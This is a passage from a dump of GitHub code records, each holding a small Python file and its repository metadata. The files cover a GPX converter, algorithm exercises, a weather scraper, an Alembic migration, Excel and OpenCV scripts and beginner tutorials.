90.0]\n dataframe = pd.merge(dataframe, pd.DataFrame(speed_per_seconde),\n on='s', how='outer')\n dataframe = dataframe.fillna(method='ffill')\n dataframe = dataframe.fillna(method='bfill')\n return dataframe\n\n\ndef process(file_in):\n \"\"\" Process files to get all geo and state information\n \"\"\"\n if file_in.find('HiTrack_') >= 0:\n info = file_in.split(\"_\")[1]\n start = info[0:13]\n end = info[13:-5]\n date = milli_to_date(start).replace(\"/\", \"\")\n start_time = milli_to_time(start).replace(':', \"\")\n end_time = 
milli_to_time(end).replace(':', \"\")\n file_out = date + \"_\" + start_time + \"_\" + end_time + \".gpx\"\n else:\n print('You have to give an original HiTrack_ file as input, not: '\n + file_in)\n return None\n\n dataframe = get_datas(file_in)\n\n text = gpx_header()\n for _, data in dataframe.iterrows():\n text += point(data)\n text += gpx_footer()\n text = text.replace(\" \\r\\n \", \"\")\n\n with open(file_out, 'w') as fout:\n fout.write(text)\n print(file_out + ' processed')\n return text\n\n\ndef main():\n \"\"\" Get args and launch action to do over files\n \"\"\"\n parser = argparse.ArgumentParser(description=DESCRIPTION)\n parser.add_argument(\n \"input_file\", nargs='*', default=os.getcwd(),\n help=\"HiTrack file to convert to GPX\")\n parser.add_argument(\n '-d', '--debug', action='store_true', help=\"enable debug output\")\n args = parser.parse_args()\n if args.debug:\n global DEBUG\n DEBUG = args.debug\n input_file = args.input_file\n\n if input_file == os.getcwd():\n for _, _, files in os.walk(input_file):\n for file_name in files:\n if file_name.find('HiTrack_') >= 0:\n process(file_name)\n else:\n for file_name in input_file:\n process(file_name)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Flaykz/HuaweiToGPX","sub_path":"export_gpx.py","file_name":"export_gpx.py","file_ext":"py","file_size_in_byte":8152,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"32"} {"seq_id":"33448047021","text":"# 부녀회장이 될테야\n# 1. 재귀로 구현해보자 -> 시간 초과\n# 2. 반복문으로 구현\n\n# 1. 재귀함수\ndef humans(floor, ho):\n if floor == 0:\n return ho\n if ho == 1:\n return humans(floor-1,ho)\n\n return humans(floor,ho-1) + humans(floor-1, ho)\n\n\n# 2. 반복문, 배열을 미리 선언해서 사용했다가 append로 추가하는식으로 변경함. 이게 더 파이썬에 맞는것 같다\n# 소요시간은 오히려 더걸려서 기존방식을 고수함\napartment = [[x for x in range(16)] for y in range(15)]\nfor floor in range(1,15):\n for ho in range(1,15):\n apartment[floor][ho] = apartment[floor-1][ho] + apartment[floor][ho-1]\n\nt = int(input())\nfor _ in range(t):\n k = int(input())\n n = int(input())\n\n print(apartment[k][n])","repo_name":"c4fiber/Algorithm_Study","sub_path":"baekjoon/basic-math1/2775.py","file_name":"2775.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} {"seq_id":"11572450631","text":"# Author : YeAung\n# Email : yeyintaung.ya276@gmail.com\n# download pretrained VGG net here : https://www.vlfeat.org/matconvnet/models/imagenet-vgg-verydeep-19.mat\n\n\nfrom core.preprocessor import Preprocessor\nfrom core.NST import NST\nimport matplotlib\n\nmatplotlib.use('TkAgg')\n\ncontent_image = Preprocessor.transform('images/louvre_small.jpg')\n\nstyle_image = Preprocessor.transform('images/monet.jpg')\n\nNST.initialize('imagenet-vgg-verydeep-19.mat')\n\nNST.set_cost_weights(alpha=0.2, beta=0.8)\n\ng_img, _ = NST.generate(content_image,style_image,no_iter=200, display=True)\n\nprocessed_img = Preprocessor.post_process(g_img)\nprocessed_img.save('output.png')\n","repo_name":"yeaung276/NeuralStyleTransfer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} {"seq_id":"4225608621","text":"# https://leetcode.com/problems/bulls-and-cows/submissions/920154081/\n# Date of Submission: 2023-03-22\n\n# Runtime: 54 ms, faster than 20.63% of Python3 online submissions for Bulls and Cows.\n# Memory Usage: 13.7 MB, less than 98.8% of Python3 online 
submissions for Bulls and Cows.\n#\n# Problem:\n\n# You write down a secret number and ask your friend to guess what the number is .\n# When your friend makes a guess, you provide a hint with the following info:\n\n# The number of \"bulls\", which are digits in the guess that are in the correct position.\n# The number of \"cows\", which are digits in the guess that are in your secret number but\n# are located in the wrong position. Specifically, the non-bull digits in the guess that \n# could be rearranged such that they become bulls.\n# \n# Given the secret number secret and your friend's guess guess, \n# return the hint for your friend's guess.\n\n\nclass Solution:\n def getHint(self, secret: str, guess: str) -> str:\n bulls = 0\n cows = 0\n guess_dict = {}\n secret_dict = {}\n for i in range(0, len(secret)):\n if guess[i] == secret[i]:\n bulls += 1\n else:\n if secret[i] in guess_dict and guess_dict[secret[i]] > 0:\n cows += 1\n guess_dict[secret[i]] -= 1\n else:\n secret_dict[secret[i]] = secret_dict.get(secret[i], 0) + 1\n if guess[i] in secret_dict and secret_dict[guess[i]] > 0:\n cows += 1\n secret_dict[guess[i]] -= 1\n else:\n guess_dict[guess[i]] = guess_dict.get(guess[i], 0) + 1\n\n return str(bulls)+\"A\"+str(cows)+\"B\"\n","repo_name":"Retroflux/playground","sub_path":"LeetCodeSolutions/Python/0299-Bulls_and_Cows/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"74714132252","text":"import requests\nfrom bs4 import BeautifulSoup\n\n\nclass Weather:\n @staticmethod\n def get_weather_today(city: str = \"санкт-петербург\") -> list:\n\n http = \"https://sinoptik.com.ru/погода-\" + city\n b = BeautifulSoup(requests.get(http).text, \"html.parser\")\n\n p3 = b.select('.temperature .p3')\n weather1 = p3[0].getText()\n p4 = b.select('.temperature .p4')\n weather2 = p4[0].getText()\n p5 = b.select('.temperature .p5')\n weather3 = p5[0].getText()\n p6 = b.select('.temperature .p6')\n weather4 = p6[0].getText()\n\n result = ''\n result = result + ('Утром :' + weather1 + ' ' + weather2) + '\\n'\n result = result + ('Днём :' + weather3 + ' ' + weather4) + '\\n'\n temp = b.select('.rSide .description')\n weather = temp[0].getText()\n result = result + weather.strip()\n\n return result\n","repo_name":"AppLoidx/VkLongPollBot","sub_path":"weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"} +{"seq_id":"26476826031","text":"\"\"\"empty message\n\nRevision ID: a6f02c599c2f\nRevises: 898407c05fd3\nCreate Date: 2022-07-11 14:09:09.785226\n\n\"\"\"\nfrom alembic import op\n\n\n# revision identifiers, used by Alembic.\nrevision = 'a6f02c599c2f'\ndown_revision = '898407c05fd3'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.create_unique_constraint('uq_user_answer', 'FormAnswer', ['form_question_id', 'user_id'])\n\n\ndef downgrade():\n op.drop_constraint('form_answer_ibfk_1', 'FormAnswer', type_=\"foreignkey\")\n op.drop_constraint('form_answer_ibfk_2', 'FormAnswer', type_=\"foreignkey\")\n op.drop_constraint('uq_user_answer', 'FormAnswer', type_=\"unique\")\n op.create_foreign_key('form_answer_ibfk_1', 'FormAnswer', 'FormQuestion', ['form_question_id'], ['id'],\n ondelete='CASCADE')\n op.create_foreign_key('form_answer_ibfk_2', 'FormAnswer', 'User', ['user_id'], ['id'], 
ondelete='CASCADE')\n","repo_name":"CybersecurityLuxembourg/openxeco-core","sub_path":"oxe-api/migrations/versions/a6f02c599c2f_.py","file_name":"a6f02c599c2f_.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"15047285119","text":"# CONDICIONALES\na = 5\nb = 6\nc = 8\n# Condiciones pueden ser evaluadas fuera del if\na_mayor_que_b = a > b \nprint(a_mayor_que_b)\n\n# Bloque estándar (las tabulaciones importan)\nif(a_mayor_que_b): # Igual que a > b\n if(a > c):\n print(f\"{a} es mayor\")\n else:\n print(f\"{c} es mayor\")\nelse:\n if(b > c):\n print(f\"{b} es mayor\")\n else:\n print(f\"{c} es mayor\")\n\n\n# Operador ternario (mayor = condicion?a:b)\ncondicion = a > b\nmayor = a if condicion else b \n\n# Solución anterior (aunque poco legible)\nmayor = a if a>b & a>c else b if b>a & b>c else c\nprint('Numero mayor:', mayor)\n\n\n# Bloque elif\nopcion = input('Ingresa una letra (A, B, C): ')\nopcion = opcion.upper()\n\nif(opcion == 'A'):\n print(\"Código de la opción A\")\nelif(opcion == 'B'):\n print(\"Código de la opción B\")\nelif(opcion == 'C'):\n print(\"Código de la opción B\")\nelse:\n print(\"Opción inválida\")\n\n\n","repo_name":"EstebanBrito/taller-basico-python","sub_path":"conditionals.py","file_name":"conditionals.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"35167277308","text":"#эта прога преобразует скорости от 60 км в час до 130 км в час с приращение 10 км\n# в американские мили\nSTART_SPEED = 60 #начальная скорость\nEND_SPEED = 131 #конечная скорость\n\nINCREMENT = 10 #приращение скорости 10 км\n\nCONVERSION_FACTOR = 0.6214 #коэффициент пересчета\n\n#печатаем заголовки таьлицы\nprint('KPH\\tMPH') #kilometer per hour and miles per hour\nprint('----------------------------')\n\n#выводим скорости\nfor kph in range(START_SPEED, END_SPEED, INCREMENT):\n mph = kph * CONVERSION_FACTOR\n print(' ',kph, '\\t', format(mph, '.1f'))","repo_name":"NeoWhiteHatA/all_my_python","sub_path":"april/speed_converter.py","file_name":"speed_converter.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19047540899","text":"def sentiment_analysis(event, context):\n \"\"\"Responds to any HTTP request.\n Args:\n request (flask.Request): HTTP request object.\n Returns:\n The response text or any set of values that can be turned into a\n Response object using\n `make_response `.\n \"\"\"\n\n from google.cloud import language_v1\n from google.cloud import firestore\n import json\n\n\n def read_data_and_add_sentiment(collection):\n\n db = firestore.Client()\n\n emails_list = db.collection(u'{}'.format(collection)).get()\n for email in emails_list:\n sentiment, magnitude = analyze_sentiment(email.get('text'))\n message_id = email.id\n\n doc_ref = db.collection(u'{}'.format(collection)).document(u'{}'.format(message_id))\n doc_ref.update({\n u'sentiment': sentiment,\n u'magnitude': magnitude\n })\n \n \n\n def analyze_sentiment(text):\n # Instantiates a client\n client = language_v1.LanguageServiceClient()\n\n # The text to analyze\n document = language_v1.Document(content=text, type_=language_v1.Document.Type.PLAIN_TEXT)\n\n # Detects the sentiment of the text\n sentiment = client.analyze_sentiment(request={'document': document}).document_sentiment\n\n print(\"Text: {}\".format(text))\n 
print(\"Sentiment: {}, {}\".format(sentiment.score, sentiment.magnitude))\n\n return(sentiment.score, sentiment.magnitude)\n\n \n read_data_and_add_sentiment('emails')\n\n text = u\"Hello, world!\"\n score, magnitude = analyze_sentiment(text)\n\n return 'Score: ' + str(score) + ', Magnitude: ' + str(magnitude)\n","repo_name":"fleadsom/dbee","sub_path":"cloud_functions/sentiment/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"12587783061","text":"\n#*Crie um programa que tenha uma FUNÇÃO chamada VOTO() que vai receber como PARÂMETRO o ANO DE NASCIMENTO de uma pessoa retornanda um valor LITERAL indicando se uma pessoa tem voto NEGADO, OPCIONAL ou OBRIGATÓRIA nas eleições.\n\ndef voto(ano):\n from datetime import date\n data = date.today().year\n idade = data - ano\n if idade <= 17:\n return(f'Com {idade} anos: VOTO NEGADO')\n else:\n if idade >= 18 and idade <= 64:\n return(f'Com {idade} anos: VOTO OBRIGATÓRIO')\n else:\n return(f'Com {idade} anos: VOTO OPCIONAL')\n\nano_nasc = int(input('Em qual ano você nasceu?: '))\nprint(voto(ano_nasc))\n","repo_name":"Werik10Souza/Desafios_em_python3","sub_path":"desafio101.py","file_name":"desafio101.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"pt","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"20745079029","text":"import cv2\nimport numpy as np\n\n\ndef preprocess(img):\n \"\"\"\n Input: Original image\n Output: Gray-scale processed image\n \"\"\"\n # convert RGB to gray-scale\n if (np.array(img).shape[2] != 1):\n gray_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n #Gassian blur\n blured = cv2.GaussianBlur(gray_img, (9,9), 0)\n #set a threshold\n thresh = cv2.adaptiveThreshold(blured, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 11, 2)\n #invert so that the grid line and text are line, the rest is black\n inverted = cv2.bitwise_not(thresh, 0)\n morphy_kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (2,2))\n # Opening morphology to remove noise (while dot etc...)\n morph = cv2.morphologyEx(inverted, cv2.MORPH_OPEN, morphy_kernel)\n # dilate to increase border size\n result = cv2.dilate(morph, morphy_kernel, iterations=1)\n return result\n\n\nif __name__ == \"__main__\":\n img = \"testimg\\sudoku_real_4.jpeg\"\n img = cv2.imread(img)\n processed = preprocess(img)\n cv2.imshow(\"img\", cv2.resize(img, (600,600), cv2.INTER_AREA))\n cv2.waitKey(0)\n","repo_name":"LTPhat/Sudoku-Solver","sub_path":"threshold.py","file_name":"threshold.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"29318402062","text":"# -*- coding:utf-8 -*-\n\nimport pandas as pd\n\ndf=pd.read_table('user_view.txt',seq=',',header=None,names=['user_id','shop_id','date'])\ndf.head()\n# df.sample(n=5)\n\ndf.sort_values(by='date',ascending=True)[:3]\ndf.sort_values(by='date',ascending=False)[:3]\n\ndf['days'] = df['date'].apply(lambda x:x[:10])\nnew_df = df[['user_id','shop_id','days']]\nnew_df.head()\n\n# count by days\npivot = new_df.pivot_table(index='days', columns='shop_id', aggfunc='count')\npivot = pivot.T\npivot.fillna(0,inplace=True)\npivot[list(column)] = pivot[list(column)].astype(float)\n#pivot.dtypes change to float 
type\npivot.head()\n\npivot.to_csv('user_view_days.csv',encoding='utf-8')\n","repo_name":"Wanghuaichen/Memo","sub_path":"大数据比赛代码/IJCAI/notafile.py","file_name":"notafile.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42270367565","text":"#Ejercicio Cronometro\r\n\"\"\"Integrantes: Maria Fernanda Uribe Hernandez - 20172020110\r\n Yeimer Serrano Navarro - 20181020060\r\n Juan David Rosero Torres - 20181020071\r\n\"\"\"\r\n\r\nfrom tkinter import *\r\nfrom tkinter.font import Font\r\nimport time\r\n\r\nglobal continuar\r\ncontinuar=True\r\nglobal seg\r\nseg=0\r\nglobal mili\r\nmili=0\r\n\r\nclass interfaz:\r\n def iniciarCronometro(self):\r\n global continuar\r\n continuar=True\r\n self.tick()\r\n def detenerCronometro(self):\r\n global continuar\r\n continuar=False\r\n def reiniciarCronometro(self):\r\n global continuar\r\n continuar= False\r\n self.text.set(\"00:00:00:00\")\r\n global seg\r\n seg=0\r\n def tick(self):\r\n global continuar\r\n global seg\r\n if(continuar): \r\n global mili\r\n if(mili==10):\r\n seg +=1\r\n mili=0\r\n self.text.set(self.controlador.get(seg)+\":\"+str(mili))\r\n mili +=1\r\n if(continuar):\r\n self.root.after(95,self.tick)\r\n \r\n def __init__(self):\r\n self.controlador = Cronometro()\r\n self.root= Tk()\r\n self.root.title(\"Cronometro\") #Ponerle el nombre a la ventana\r\n self.root.geometry(\"350x100\")\r\n self.root.resizable(False,False)\r\n self.text = StringVar()\r\n self.text.set(\"00:00:00:00\")\r\n self.myFont =Font(family=\"Times New Roman\", size=18)\r\n self.etiqueta = Label(self.root,textvariable=self.text)\r\n self.etiqueta.pack()\r\n self.etiqueta.configure(font=self.myFont)\r\n self.btnReiniciar = Button(self.root,text=\"Reiniciar\",fg=\"Blue\",command= self.reiniciarCronometro).place(x=10,y=70,height=20,width=80) \r\n self.btnIniciar = Button(self.root,text=\"Iniciar\",fg=\"Green\",command= self.iniciarCronometro).place(x=130,y=70,height=20,width=80) \r\n self.btnParar = Button(self.root,text=\"Parar\",fg=\"red\",command= self.detenerCronometro).place(x=250,y=70,height=20,width=80) \r\n \r\n\r\nclass tiempo:\r\n def __init__(self,n):\r\n self.tiempo_seg=time.gmtime(n)\r\n \r\n\r\nclass horas(tiempo): \r\n def __init__(self,n):\r\n tiempo.__init__(self, n)\r\n self.get() \r\n def get(self):\r\n return (time.strftime(\"%H\",self.tiempo_seg ))\r\n \r\nclass minutos(tiempo): \r\n def __init__(self,n):\r\n tiempo.__init__(self, n)\r\n self.get()\r\n def get(self):\r\n return (time.strftime(\"%M\",self.tiempo_seg ))\r\n \r\nclass segundos(tiempo): \r\n def __init__(self,n):\r\n tiempo.__init__(self, n)\r\n self.get()\r\n def get(self):\r\n return (time.strftime(\"%S\",self.tiempo_seg ))\r\n \r\n \r\nclass Cronometro():\r\n def get(self,j):\r\n t=segundos(j)\r\n s= t.get()\r\n t=minutos(j)\r\n m= t.get()\r\n t=horas(j)\r\n h= t.get() \r\n self.aux=h+\":\"+m+\":\"+s\r\n return self.aux \r\n \r\n\r\nApp=interfaz()\r\nApp.root.mainloop() #Mantiene la ventana abierta\r\n","repo_name":"devFernandaUribe/Cronometro-con-interfaz","sub_path":"Cronometro.py","file_name":"Cronometro.py","file_ext":"py","file_size_in_byte":3036,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19465273779","text":"# 直接执行即可测试\n\n# 功能:快速定位复杂 js 代码中的函数部分的字符串\n# 因为代码很短,复制使用即可,按照测试的写法写即可。\n# 开发于 python3 ,是对已经存在库的内部函数的挂钩式处理后增加了自己想要的功能\n\n# 依赖, pip install pyjsparser\n# 如果你安装过了 js2py ,那么这个库就已经安装了。\n\nimport 
pyjsparser\n\nclass PyJsHooker:\n Identifier = 3 # pyjsparser.pyjsparserdata.Token.Identifier\n func_stack = []\n func_count = {}\n func_local = []\n def _expect_hook(self, value):\n index = len(PyJsHooker.func_stack)\n if self.lookahead['value'] == '{':\n if index not in PyJsHooker.func_count:\n PyJsHooker.func_count[index] = 1\n else:\n PyJsHooker.func_count[index] += 1\n if self.lookahead['value'] == '}':\n PyJsHooker.func_count[index] -= 1\n if index in PyJsHooker.func_count and PyJsHooker.func_count[index] == 0 and self.lookahead['value'] == '}':\n if PyJsHooker.func_stack:\n (name, start), end = PyJsHooker.func_stack.pop(), self.lookahead\n name = name['value'] if name['type'] == PyJsHooker.Identifier else '[Anonymous function]'\n PyJsHooker.func_local.append((name, start['start'], end['end']))\n return PyJsHooker._bak_expect(self, value)\n def _expectKeyword_hook(self, w):\n orFunc = self.lookahead\n isFunc = True if self.lookahead['value'] == 'function' else False\n r = PyJsHooker._bak_expectKeyword(self, w)\n crFunc = self.lookahead\n if isFunc:\n name = crFunc if crFunc['type'] == PyJsHooker.Identifier else None\n PyJsHooker.func_stack.append([crFunc, orFunc])\n return r\n _bak_expect = pyjsparser.PyJsParser.expect\n _bak_expectKeyword = pyjsparser.PyJsParser.expectKeyword\n pyjsparser.PyJsParser.expect = _expect_hook\n pyjsparser.PyJsParser.expectKeyword = _expectKeyword_hook\n def __init__(self):\n self.parser = pyjsparser.PyJsParser()\n\n def parse(self, script):\n PyJsHooker.func_stack = []\n PyJsHooker.func_count = {}\n PyJsHooker.func_local = []\n self.parser.parse(script)\n return PyJsHooker.func_local\n\n\nif __name__ == '__main__':\n script = '''// test_code\n function func(a,b){\n function ffff(){\n var sadf = \"12312{31}23\";\n var fffasdf = \"123123123\", aaa;\n var qqq = {\"123123\":123123};\n return 133;\n }\n\n (function(){\n console.log(ffff);\n })();\n\n return a+b;\n }\n\n var a = 123;'''\n s = PyJsHooker()\n\n for local in s.parse(script):\n name, start, end = local\n v = script[start:end]\n print('===================================')\n print('function name:{}, start:{}, end:{}'.format(name, start, end))\n print('-----------------------------------')\n print(v)","repo_name":"cilame/any-whim","sub_path":"处理js代码中定位function代码的部分.py","file_name":"处理js代码中定位function代码的部分.py","file_ext":"py","file_size_in_byte":3006,"program_lang":"python","lang":"en","doc_type":"code","stars":128,"dataset":"github-code","pt":"32"} +{"seq_id":"36681335651","text":"import matplotlib.pyplot as plt\nimport math as mat\ndef frange(start, stop=None, step=None):\n start = float(start)\n if stop == None:\n stop = start + 0.0\n start = 0.0\n if step == None:\n step = 1.0\n\n print(\"start = \", start, \"stop = \", stop, \"step = \", step)\n\n count = 0\n while True:\n temp = float(start + count * step)\n if step > 0 and temp >= stop:\n break\n elif step < 0 and temp <= stop:\n break\n yield temp\n count += 1\n\ndef parabola(vo,agl,x1,y1):\n X = []\n Y = []\n \n\n Sin = mat.sin(mat.radians(agl))\n Cos = mat.cos(mat.radians(agl))\n\n g = 9.8\n w = float((2 * vo * Sin) / g)\n\n atas = float(mat.pow(vo,2) * mat.pow(Sin,2))\n bawah = float(2*g)\n hMax = float(atas/bawah)\n R = vo * Cos * w\n g = g * -1\n\n posX = x1\n posY = y1\n\n voX = float(vo * Cos)\n voY = float(vo * Sin)\n\n\n\n X.append(posX)\n Y.append(posY)\n\n for t in frange(0,w+0.1,0.1):\n \n posX = voX * t\n X.append(posX)\n posY = vo * t * Sin + (0.5 * g * mat.pow(t,2))\n Y.append(posY)\n \n if posY < 0:\n print('Waktu Analitik 
ketika menyentuh tanah : ',t)\n print('Jarak Maksimal dari Analitik ',posX)\n print('\\n')\n break\n \n \n print('Waktu Total : ',w)\n plt.xlabel('Jarak')\n plt.ylabel('Ketinggian')\n plt.plot(X,Y)\n plt.xlim(0,R+1)\n plt.ylim(0,hMax+0.1)\n print ('Jarak Maksimum : ',R)\n print ('Tinggi Maksimum : ',hMax)\n plt.show()","repo_name":"Geofisika-UGM/2023-project-kelompok-11_powerranger","sub_path":"parabola.py","file_name":"parabola.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3185369477","text":"import torch\nimport torch.nn as nn\n\nclass ReConsLoss(nn.Module):\n def __init__(self, recons_loss, nb_joints, pose_alpha):\n super(ReConsLoss, self).__init__()\n \n if recons_loss == 'l1': \n self.Loss = torch.nn.L1Loss()\n elif recons_loss == 'l2' : \n self.Loss = torch.nn.MSELoss()\n elif recons_loss == 'l1_smooth' : \n self.Loss = torch.nn.SmoothL1Loss()\n \n self.nb_joints = None\n # 4 global motion associated to root\n # 12 local motion (3 local xyz, 3 vel xyz, 6 rot6d)\n # 3 global vel xyz\n # 4 foot contact\n if nb_joints is not None:\n self.nb_joints = nb_joints\n self.motion_dim = (nb_joints - 1) * 12 + 4 + 3 + 4\n else:\n self.jaw_alpha = 1.0\n self.pose_alpha = pose_alpha\n \n def forward(self, motion_pred, motion_gt) :\n if self.nb_joints is not None:\n loss = self.Loss(motion_pred[..., : self.motion_dim], motion_gt[..., :self.motion_dim])\n else:\n exp_loss = self.Loss(motion_pred[:,:,:50], motion_gt[:,:,:50])\n rot_loss = self.Loss(motion_pred[:,:,50:53], motion_gt[:,:,50:53])*self.pose_alpha\n jaw_loss = self.jaw_alpha * self.Loss(motion_pred[:,:,53:56], motion_gt[:,:,53:56])\n loss = exp_loss+rot_loss+jaw_loss\n return loss\n \n def forward_vel(self, motion_pred, motion_gt) :\n if self.nb_joints is None:\n vel_pred = torch.cat((\n torch.zeros_like(motion_pred[:,:1,:]),\n motion_pred[:,1:,:]-motion_pred[:,:-1,:]\n ), dim=1)\n vel_gt = torch.cat((\n torch.zeros_like(motion_gt[:,:1,:]),\n motion_gt[:,1:,:]-motion_gt[:,:-1,:]\n ), dim=1)\n loss = self.Loss(vel_pred, vel_gt)\n else:\n loss = self.Loss(motion_pred[..., 4 : (self.nb_joints - 1) * 3 + 4], motion_gt[..., 4 : (self.nb_joints - 1) * 3 + 4])\n return loss\n \n \n","repo_name":"sanjayss34/lm-listener","sub_path":"utils/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"32"} +{"seq_id":"70713303452","text":"import asyncio\nimport aiohttp\nimport aiofiles\n\nurls = {\n \"http://kr.shanghai-jiuxin.com/file/2020/1029/bf3b122b6e1ddd9777dadc6ca97b22e6.jpg\",\n \"http://kr.shanghai-jiuxin.com/file/2020/0316/1383df6982db26460d655d67c3dc4726.jpg\",\n \"http://kr.shanghai-jiuxin.com/file/2021/0429/3f381541926e01ece21fd210f59af6d2.jpg\"\n}\n\n\nasync def aiodownload(url):\n name = url.rsplit(\"/\", 1)[1]\n # aiohttp.ClientSession() <=> requests\n async with aiohttp.ClientSession() as session: # requests\n async with session.get(url) as resp: # resp=requests.get()\n async with aiofiles.open(name, mode=\"wb\") as f: # 写入文件\n await f.write(await resp.content.read()) # 读取内容是异步的,需要await\n\n\nasync def main():\n tasks = []\n for url in urls:\n tasks.append(aiodownload(url))\n\n await asyncio.wait(tasks)\n\n\nif __name__ == '__main__':\n 
asyncio.run(main())\n","repo_name":"Andy-Lv/Python-Learning","sub_path":"爬虫/第4章/03_协程下载图片.py","file_name":"03_协程下载图片.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12588541729","text":"'''Program to print pattern below\n 1\n 12\n 123\n 1234\n 12345\nif (N=5) is given by user\nhere one loop of i is runing for row and one loop of j is running for column to print the value of j recursively '''\nN= int(input(\"input:\"))\nfor i in range(0,N+1):\n for j in range(1,i+1):\n print(j,end =\"\")\n print()\n","repo_name":"rajrahul1997/Code-Practice","sub_path":"pattern/pattern4.py","file_name":"pattern4.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26413280160","text":"from openpyxl.styles import Font, Border, Side, PatternFill, Alignment\nfrom openpyxl import load_workbook\n\nwb = load_workbook(\"rpa_test5.xlsx\")\nws = wb.active\n\n# 번호, 영어, 수학\na1 = ws['A1'] # 번호\nb1 = ws['B1'] # 영어\nc1 = ws[\"C1\"] # 수학\n\n# 셀 너비 지정\nws.column_dimensions['A'].width = 5\n\n# 셀 높이 지정\nws.row_dimensions[1].height = 50\n\n# 스타일 적용\n# 1. 폰트 적용: from openpyxl.styles import Font\na1.font = Font(color = \"FF0000\", italic = True, bold = True) # 색상 RGB 빨강, 이탤릭체 적용, 볼드 적용\nb1.font = Font(color = \"CC33FF\", name = \"Arial\", strike = True) # 색상 RGB CC33FF, 글꼴 Arial, 취소선(strike) 적용\nc1.font = Font(color = \"0000FF\", size = 20, underline=\"double\") # 색상 RGB 0000FF, 글자크기 20, 밑줄 double 적용(single / double 옵션)\n\n# 2. 테두리 적용: from openpyxl.styles import Border, Side\nthin_border = Border(left = Side(style = \"thin\"), right = Side(style = \"thin\"), top = Side(style = \"thin\"), bottom= Side(style = \"thin\"))\na1.border = thin_border\nb1.border = thin_border\nc1.border = thin_border\n\n# 3. 배경색 적용\n# 90점 넘는 셀에 대해서 초록색으로 적용\nfor row in ws.rows:\n for cell in row:\n\n# 4. cell 정렬: from openpyxl.styles import Alignment\n cell.alignment = Alignment(horizontal=\"center\", vertical= \"center\") # center, left, right, top, bottom\n if cell == 1: # A 번호 열은 제외\n continue\n \n if isinstance(cell.value, int) and cell.value > 90: # isinstance: cell의 값이 정수형이고 90 보다 높으면\n # from openpyxl.styles import PatternFill\n cell.fill = PatternFill(fgColor = \"00FF00\", fill_type= \"solid\") # 배경색 설정\n cell.font = Font(color=\"FF0000\") # 폰트 색상 변경\n\n# 5. 
틀 고정\nws.freeze_panes = \"B2\" # B2기준으로 틀 고정\n\nwb.save(\"rpa_test5_style.xlsx\")","repo_name":"Choi-09/Python","sub_path":"python_projects/RPA/1_excel/11_cell_style.py","file_name":"11_cell_style.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} {"seq_id":"18846442056","text":"from typing import List, Tuple, Union\nimport numpy as np\n\nfrom .Region import Region\nfrom .Utils import point_to_line_distance as p2l\n\n\nclass LinealCollider():\n \"\"\"Creates a lineal collider\n\n Args:\n X0 (Union[list, np.ndarray]): Initial point of collider\n XF (Union[list, np.ndarray]): End point of collider\n \"\"\"\n\n def __init__(self, X0: Union[list, np.ndarray], XF: Union[list, np.ndarray]) -> None:\n \"\"\"Creates a lineal collider\n\n Args:\n X0 (Union[list, np.ndarray]): Initial point of collider\n XF (Union[list, np.ndarray]): End point of collider\n \"\"\"\n X0 = np.array(X0)\n XF = np.array(XF)\n self.X0 = X0\n self.XF = XF\n self.delta = XF-X0\n self.l = np.linalg.norm(self.delta)\n self.n = np.array([-self.delta[1]/self.l, self.delta[0]/self.l])\n self.color = 'black'\n\n def callback(self, object: 'Node') -> None:\n \"\"\"Callback of the collider\n\n Args:\n object (Node): Node which collides\n \"\"\"\n pass\n\n def draw(self, region: Region) -> None:\n \"\"\"Draws the lineal collider\n\n Args:\n region (Region): Drawing Region\n \"\"\"\n region.create_line(self.X0, self.XF, color=self.color, width=10)\n\n\nclass Wall(LinealCollider):\n \"\"\"Creates a Wall\n\n Args:\n x0 (List): Initial point of wall\n xf (List): End point of wall\n \"\"\"\n\n def __init__(self, x0: List, xf: List) -> None:\n 